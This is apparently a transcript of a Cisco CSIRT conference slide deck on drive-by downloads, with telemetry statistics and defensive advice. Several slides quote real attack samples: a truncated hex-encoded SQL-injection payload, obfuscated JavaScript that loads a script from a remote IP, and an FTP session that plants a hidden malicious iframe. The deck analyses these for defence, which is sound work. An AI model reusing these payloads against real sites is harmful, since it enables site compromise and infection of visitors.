A Study on the State of Web Security

825 views

Published on

It's 2011. Why are we still dealing with drive-by downloads? We combine telemetry data from two web security products with millions of users to answer some of today's top questions. Where are the malicious payloads hosted? How are legitimate sites infected by criminals? Do we really want to block the unintentionally malicious sites? Use these answers to optimize your web security efforts.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
825
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
28
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

A Study on the State of Web Security

  1. 1. A Study on the State ofWeb SecurityHenry SternSecurity InvestigatorCisco CSIRT© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 1
  2. 2. 1.  Hacked While Browsing2.  Web Exploit Architecture3.  The Study4.  Securing your Clients and Servers© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 2
  3. 3. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
  4. 4. 4 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 4
  5. 5. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 5
  6. 6. 6© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 6
  7. 7. •  Let’s see what’s happening behind the scenes© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 7
  8. 8. How does a Web Page Work? HTML: Web site “recipe.” Initial HTML retrieval provides “recipe”. Browser then fetches all objects listed in initial HTML “recipe”. Web Resources: The actual ingredients. Retrieved, per the HTML, from any specified location. Includes Images Scripts Executable objects (“plug-ins”) Other web pages© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 8
  9. 9. •  URLs in browser: 1 •  HTTP Gets: 162 •  Images: 66 from 18 domains including 5 separate 1x1 pixel invisible tracking images •  Scripts: 87 from 7 domains •  Cookies: 118 from 15 domains •  8 Flash objects from 4 domains© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 9
  10. 10. •  Web page HTML is the recipe •  Code snippets are web site ingredients •  The browser will fetch each ingredient •  Each ingredient initiates a HTTP transaction© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 10
  11. 11. •  “Application Vulnerabilities Exceed OS Vulnerabilities”•  IE and Firefox vulnerable•  “…hundreds of vulnerabilities in ActiveX controls installed by software vendors have been discovered.” Sources: SANS Top Cyber Security Risks 2007, 2009 http://www.sans.org/top-cyber-security-risks/© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 11
  12. 12. •  Quicktime, Java, Flash, Reader, DirectX •  Explosion of Browser Helper Objects and third-party plug-ins •  Plug-ins are installed (semi) transparently by website. Users unaware an at-risk helper object or plug-in is installed … introducing more avenues for hackers to exploit users visiting malicious web sites.12 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 12
  13. 13. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 13
  14. 14. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 14
  15. 15. •  brookeseidl.com registered at eNom 2002•  63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains Script injected onto web page – one extra ingredient!© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 15
  16. 16. •  Browser fetches h.js javascript from tejary.net•  Tejary.net registered 2003 at GoDaddy and hosted on 68.178.160.68 in Arizona•  Registered by Aljuraid, Mr Nassir A in Saudi Arabia•  Tejary.net/h.js calls two remote iframe objects© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 16
  17. 17. •  V3i9.cn registered at by On 3/25/09. DNS by mysuperdns.com•  Hosted on 216.245.201.208 at Limestone Networks in Dallas, TX•  Fetched objects include ipp.htm, real.html, real.js 14.htm, 14.Js flash.htm, igg.htm© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 17
  18. 18. It all starts with /c.htm loaded from tejary.net, said7.comReal Player Exploit•  /ipp.htm – Real Player exploit CVE-2008-1309•  2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky•  /real.htm, /real.js – Real Player exploit CVE-2007-5601MDAC (Microsoft Data Access Component) Exploit•  /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functionsFlash Exploit•  /swfobject.js – detects flash version and selects according content•  /flash.htm – Flash exploit. 2/40 anti-virus vendors detect•  /igg.htm - ??? Called from /flash.htm for exploit?© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 18
  19. 19. •  After successful exploit, malware installed from v3i9.cn•  ce.exe = Gh0st malware Keylogging, web cam monitoring Persistent connection to China: 58.253.68.68 vobe.3322.org© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 19
  20. 20. “…Criminals have used the Internet to steal more than $100 million from U.S. banks so far this year and they did it without ever having to draw a gun or pass a note to a teller… …Ive seen attacks where theres been $10 million lost in one 24-hour period.” -Shawn Henry FBI Assistant Director, Cyber Division 8 Nov 2010 CBS “60 Minutes”© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 20
  21. 21. •  Ce.exe analyzed on Virus Total 31% detection on days 1, 2 48% detection on day 3 •  21% detection for SMS.exe© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 21
  22. 22. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 22
  23. 23. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 23
  24. 24. “By enticing a user to visit a maliciously crafted web page, an attacker may trigger the issue, which may lead to arbitrary code execution.”© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 24
  25. 25. •  Lots of legitimate web surfing.•  Our enterprise customers each request millions of pages per day.•  Miscreants tap in to legitimate traffic.•  Advantages: You don’t have to create new things. Piggyback on sites’ reputation, page rank.•  Risk proportional to reward.© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 25
  26. 26. •  Infected thousands of websites with vulnerable ASP and Cold Fusion pages and MSSQL database.•  Infections persist to this day!•  How? Google hacking + run on anyPOST /somefile.asp ID=123;DECLARE%20@S schema SQL injection. %20NVARCHAR(4000);SET%20@S=CAST (0x4400450043004C004 … 0073006F007200%20AS %20NVARCHAR(4000));EXEC(@S);© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 26
  27. 27. •  Victims infected with info stealer by drive-by download.•  Steals FTP credentials from victims.•  Obfuscated javascript code is inserted into any file that contains a <body> tag.•  New victims are infected through victim’s own website.•  Infected sites were de-listed by Google. document.write(unescape(‘Dp%3CscOCrmKfipa0tie%20sa0rDpc%3D4P%2FvI %2F94c30%2EOC2vI474P%2E2%2E1a095vI%2FOCj0yhqueier0yhy%2Ejs%3E <script src=//94.247.2.195/jquery.js></script> %3CDp%2Fsc30cri4Ppc30tDp%3E’).replace(/4P|mKf|0yh|c30|vI|ie|a0|OC|Dp/ g,""));© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 27
  28. 28. [SOCKS 5 header]USER victimPASS a 9-digit secure random passwordPASVTYPE IRETR //public_html/forum/db/index.htmPASV<iframe src="http://activeware.cn/ind.php" width="1" height="1"TYPE I alt="YTREWQhej2Htyu"STOR style="visibility:hidden;position:absolute”></iframe> //public_html/forum/db/index.htmQUIT Source: Christian Kreibich at ICSI Berkeley© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 28
  29. 29. •  Whole website with aggressive SEO uploaded to compromised host.•  Hotlinks to images on legitimate websites.•  GIS queries send users to SEO site instead of image host.•  Links to drive-by download.© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 29
  30. 30. 30© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 30
  31. 31. •  Malicious banner ads unknowingly served by Google and Microsoft.•  Caused a drive-by download.•  ScanSafe: 10% of hits via Hotmail. Adshufffle.com•  Installed fake AV.© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 31
  32. 32. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 32
  33. 33. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 33
  34. 34. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 34
  35. 35. •  Phone-home data from thousands of IronPort web proxies.•  Anonymized traffic summaries.•  Web reputation: Bad, Neutral and Good. Default actions: Block, scan, allow. Plus content policies.•  Randomly sampled 1 billion clicks from pool of 3 trillion.•  Used actual action taken by the appliance.© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 35
  36. 36. Bad; 1% Good; 14% 93% Blocked 1% Blocked Neutral; 85% 3% Blocked© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 36
  37. 37. Flash; 2% Other; 9% CSS; 3% Zip; 0% XML; 3% Binary; 3% Video; 5% Image; 45% Javascript; 13% HTML; 17%© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 37
  38. 38. 0.90% 0.80% 0.80% 0.70% 0.60% 0.50% 0.40% 0.30% 0.20% 0.17% 0.20% 0.08% 0.07% 0.10% 0.00% Javascript Flash PDF Image Binary© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 38
  39. 39. Good: 5% Bad: 21% Neutral: 74%© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 39
  40. 40. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 40
  41. 41. •  Users Targeted training designed to defend against social engineering.•  Host-level Patch browser and applications. Audit all applications and files on desktops. “Lock down” hosts where applicable.•  Network-level security Reputation and content scanning for all web objects. Secure HTTPS. Usability vs. security: block objects not pages. Active detection of infected users.© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 41
  42. 42. •  Secure web application development (OWASP).•  Vulnerability assessment before deployment.•  Regular penetration testing.•  Monitor site security and integrity.•  Pay attention to third-party software.•  Consider Web Application Firewall.•  Outbound scanning with AV/Safe Browsing.•  Two-factor authentication.•  IP-based access controls.© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 42
  43. 43. •  Compliance and auditing.•  Security posture.•  Third-party integration.•  Secondary usage of data.•  Geographical affinity.•  Incident reporting.© 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 43
  44. 44. Thank you.

×